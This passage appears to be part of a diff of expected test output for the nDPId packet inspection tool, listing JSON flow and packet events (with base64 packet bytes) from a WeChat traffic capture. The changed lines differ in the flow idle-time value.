-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171164904,"flow_last_seen":1492171164904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171164904,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1492171164904,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171164904,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRVAAEAG2hjAqAFnX2UiIpknAFAjQjGZFOMj7IAQBf7IcQAAAQEICgA\/RIBwfIhZ"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166312,"flow_last_seen":1492171166312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166312,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1492171166312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166312,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/65AAEAG93\/AqAFnX2UiIYi0AFB\/4ffk18M9+4AQCyPvSAAAAQEICgA\/ReBr6XAp"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166440,"flow_last_seen":1492171166440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166440,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1492171166440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166440,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqRAAEAGaIrAqAFnX2UiIYi3AFBZ1tlh3d8I5IAQBaRnrgAAAQEICgA\/RgBr6XCp"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166696,"flow_last_seen":1492171166696,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166696,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1492171166696,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166696,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7pAAEAGr3TAqAFnX2UiIYi4AFDlnJrhImFMS4AQCdyNBgAAAQEICgA\/RkBr6XGp"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nhAAEAGJLXAqAFnX2UiIpk\/AFBMVGJPaE9vZoAQBU7AugAAAQEICgA\/R6BwfJTZ"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkNAAEAG0OvAqAFnX2UiIYilAFA23DHngeAL9oAQBaSDAQAAAQEICgA\/R6Br6Xcq"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171164904,"flow_last_seen":1492171164904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171164904,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1555,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1492171164904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171164904,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRVAAEAG2hjAqAFnX2UiIpknAFAjQjGZFOMj7IAQBf7IcQAAAQEICgA\/RIBwfIhZ"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166312,"flow_last_seen":1492171166312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166312,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1556,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1492171166312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166312,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/65AAEAG93\/AqAFnX2UiIYi0AFB\/4ffk18M9+4AQCyPvSAAAAQEICgA\/ReBr6XAp"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166440,"flow_last_seen":1492171166440,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166440,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34999,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1557,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1492171166440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166440,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqRAAEAGaIrAqAFnX2UiIYi3AFBZ1tlh3d8I5IAQBaRnrgAAAQEICgA\/RgBr6XCp"} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171166696,"flow_last_seen":1492171166696,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171166696,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":35000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1492171166696,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171166696,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7pAAEAGr3TAqAFnX2UiIYi4AFDlnJrhImFMS4AQCdyNBgAAAQEICgA\/RkBr6XGp"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39231,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1559,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nhAAEAGJLXAqAFnX2UiIpk\/AFBMVGJPaE9vZoAQBU7AugAAAQEICgA\/R6BwfJTZ"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171168104,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171168104,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.33","src_port":34981,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1492171168104,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171168104,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkNAAEAG0OvAqAFnX2UiIYilAFA23DHngeAL9oAQBaSDAQAAAQEICgA\/R6Br6Xcq"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1492171169377,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1492171169377,"pkt":"8IQvSpdgeJKcD6iOCABFEABMYzZAAEAR4JXAqAFnwcxy6ZLKAHsAOA7KIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANybOCEWgBhs"} 00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1561,"source":"wechat.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1492171169377,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"},"ntp": {"request_code":0,"version":0}} 
-02086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"wechat.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1492171171688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492171171688,"pkt":"8IQvSpdgeJKcD6iOCABFAATYpo1AAEAGahPAqAFny82XotOnAbtQhl2xjWp\/PoAYBaR4aAAAAQEICgA\/SyBF4BL0FwMDBJ8AAAAAAAAAk06IK7tTPaQ0tnXGeqHKil75lMj6OyIERVlvQ89pkJ\/5uFrYubJHeJqSrynvitkot5qunWtMUvVbyI8vjd8zycM9IsUAAB\/fKHCxwAngzbmC6gdk\/UoKTL4MIPiK4NVVPRz1DsYhuoql6sqmFMKJKaM6NXpyBkCtYpvlazDCWxllWCP\/i12XdKQQMbcGYN2wvAB3a6vg6oJPIx+XXkk4cY\/+EENsi+PDerl+pB2IlJMObTfaJBhM\/rJFUKMd1xriphMBzgM9PCE+gKKP\/k+AYg8NddY\/gnJX\/+unfAflhC1NZ1nFt2\/\/Y9gesYC0uhG0uLLlbtLmKF2MPjllgxHAEeq6L2rXw2szIJL4yllp+t9tcKCYfzVRzCQkgUtQQaP0YiRh1NQtDTvnuPpM8CS6YfFOx17PkSNzepokWNsrLXMtr9p2nc9zczirZ\/D9H9Xey3Xx0qFAN\/MVzWUXfWpSlTWrXzNWP5kDdvTYBf19VGMPfxtzLKYTLOd\/rVswJ6OAUsAdfTYAu7j6c4KJubGecouom8T9brd1TJm6pyXignKkiQR+nvp0U\/G\/NxhEcnKV91SvFM0mQxh+hfK10svoh9dj1Bq8+PvXaAQljscptiwRlr+X\/V1zPyapTZcrW9A2fGrnzKqVYJASiCPQWyYD8Mn6pda0e6knRW3Ae28WpLnmyjMKx4\/7dOqugSoKa3q7BQRxbcpbcOXlPFfrjt+CwbA3KCTzFvdocE4QeSDn8FuJ85HFummmQOxK7tDtjljV+L\/2nbiMgjTy6jJzYFwXGw6xLdoXOupF5XjIfHUSMeB+R0BhUmtVxXEWPPHfAVdVJcBt8uO5QMhp9jxrSrOX54VXB+P7Qj0VmSag75Jhz20k8Z3uI27cFcp7OjdlKhlEBtlzESNSQ8FGkqCxygPJSf0REdvr2uQA0ApTgzzF+s6YbdeH3vy1SJOH2fQsH4IeYeRjAPrh1RmlhN066XBLLeGtIiz1LEJx17TCB8c1JpUan\/1+JYoV0SCzXlaZWYybCxcBBIz\/2EdpG8hJzN4rtTVwf\/3OYFkhRTMbe1PHW9T5IfuTuKU76wWlDp+aujzjWp1vvFdq4bUrI6AdEquAU5C3BTnuLB9tqzlOb5nzcQjb4fPQCkUUcvHBPPLW9qrLyB05aTRG1W9ShnsibG\/AerW39YgPMVulkynnwtbGsYcGZs7KelCQXCLt3D6RU08N5SulLgw+o5aYItue0wJaW5VDEXxAVhsE4KU4+QsEuXkbd9rTsMt9Gf+Td49H8NzJEXxlYX\/ThtsZsn5doQpcdUcGVMiJrwpHQzTDWZLiBcd51axsLca9fP61xaeKb48j0Kb0TeXy0DcAfEDH4Sy29YAuNi7N4uKdxMrzHsqaQhCFI\/jmx6CqCWjy1zA6Ijzjpx6KTEeNxn3m7OTzuxckZQeS0ArKR7BX7UnCFIAenlvKt7e\/DzO9W1DndidXP+Qwf3XzvB+q
venTl6HWA0XtGBky3MCwBE5b++HXnyFlygjOvbY7LPZovuQtASvUqwAHPkuONuar\/2ZEP2TwCB+AOJYrpZq+HLOc"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171175912,"flow_last_seen":1492171175912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171175912,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"wechat.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1492171175912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171175912,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0iE1AAEAGSqnAqAFn2DrNg+MfAbtA+v0fFZsbqIAQAT54MgAAAQEICgA\/T0Ay2r7t"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.34.34","src_port":39195,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA01BdAAEAGIxbAqAFnX2UiIpkbAFBTLvPZ9eqaX4ARCgvX7AAAAQEICgA\/UBZwfB+e"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/69AAEAG937AqAFnX2UiIYi0AFB\/4ffl18M9+4ARCyPlEAAAAQEICgA\/UBZr6XAp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"wechat.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0jqVAAEAGaInAqAFnX2UiIYi3AFBZ1tli3d8I5IARBaRdlQAAAQEICgA\/UBdr6XCp"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0R7tAAEAGr3PAqAFnX2UiIYi4AFDlnJriImFMS4ARCdyDLQAAAQEICgA\/UBdr6XGp"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"wechat.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0HRZAAEAG2hfAqAFnX2UiIpknAFAjQjGaFOMj7IARBf682AAAAQEICgA\/UBdwfIhZ"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"95.101.180.179","src_port":52020,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0251AAEAGiP7AqAFnX2W0s8s0AFCaGNVHW3dgu4ARJJf1WAAAAQEICgA\/UBcc0iJk"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171176772,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492171176772,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.147.171","src_port":58226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"wechat.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0e59AAEAGnZzAqAFny82Tq+NyAbsh7o58Fu1nsYARAOW08AAAAQEICgA\/UBdF3\/Tx"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"wechat.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0JkRAAEAG0OrAqAFnX2UiIYilAFA23DHogeAL9oARBaR6iAAAAQEICgA\/UBdr6Xcq"} 
-00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"wechat.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1492171176772,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492171176772,"pkt":"8IQvSpdgeJKcD6iOCABFAAA00nlAAEAGJLTAqAFnX2UiIpk\/AFBMVGJQaE9vZoARBU64QQAAAQEICgA\/UBdwfJTZ"} 